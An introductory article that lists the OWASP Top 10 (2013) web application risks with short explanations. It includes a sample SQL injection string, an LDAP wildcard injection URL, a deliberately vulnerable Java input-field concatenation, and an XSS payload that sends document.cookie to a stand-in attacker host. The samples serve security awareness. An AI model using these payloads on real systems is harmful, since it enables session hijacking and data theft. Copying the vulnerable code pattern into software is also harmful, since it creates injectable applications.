OWASP Top 10 Vulnerabilities

The OWASP Top Ten provides a powerful awareness for web application security. In this article is the top 10 security risks listed by OWASP 2013.

OWASP

The Open Web Application Security Project (OWASP) is a worldwide not-for-profit charitable organization focused on improving the security of software and websites.

1. Injection

Common types of injection types are:

  1. SQL injection (SQL injection occurs when a user-supplied field is not strongly typed or not filtered for escape characters or is not checked for type constraints) as in the following:

    (SELECT * FROM Authentication WHERE name = '' OR '1'='1' -)

  2. OS Injection (occurs when calling external applications from your application, for example by using System.Diagnostics.Process.Start is a .Net command to call an OS function).

  3. LDAP injection (LDAP Injection occurs when a hacker constructs LDAP statements based on user input, for example if the site is using Active Directory).

    http://www.mysite.com/Auther.aspx?uid=*

2. Broken Authentication and Session Management

This type of security issue is caused by the following:

  1. Authentication credentials aren't protected properly.
  2. Weak session IDs.
  3. SessionIDs are exposed in the URL.
  4. Session IDs don't time out
  5. Session IDs aren't rotated after successful login
  6. Passwords, session IDs, and other credentials are sent over unencrypted connections

3. Cross-Site Scripting (XSS)

This type of Security issue occurs if all user supplied input is not properly escaped, or not verified to be safe using input validation  as in the following:

(String) page += "<input name='mycarddetails' type='TEXT' value='" + request.getParameter("DB") + "'>";

The attacker can modify the "DB" parameter in their browser to:

'><script>document.location= 'http://www.attacker.com/dataforge.cgi ?foo='+document.cookie</script>'.

4. Insecure Direct Object References

This type of security issue occurs when the software failed to verify whether the user is authorized to access the exact resource they have requested or not.

http://example.com/app/accountInfo?acct=notmyacct

5. Security Misconfiguration

This type of security issue occurs if your software is out of date or there are any unnecessary features enabled or installed or default accounts and their passwords are still enabled and unchanged or security settings in your development frameworks and libraries are not set to secure values.

6. Sensitive Data Exposure

This type of security issue occurs if proper measures are not taken on the data when at rest, in transit or in browsers.

7. Missing Function Level Access Control

This type of security issue occurs when anyone with the network access can access private functionality from a different user or send private requests from there.

8. Cross-Site Request Forgery

This type of security issue occurs by forcing the victim's browser to generate requests, while as an authenticated user.

9. Using Components with Known Vulnerabilities

This type of security issue occurs when a hacker identifies a weak or vulnerable component used in the website and tries to attack that component.

10. Unvalidated Redirects and Forwards

This type of security issue occurs when using invalidated redirects and forwards. Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input.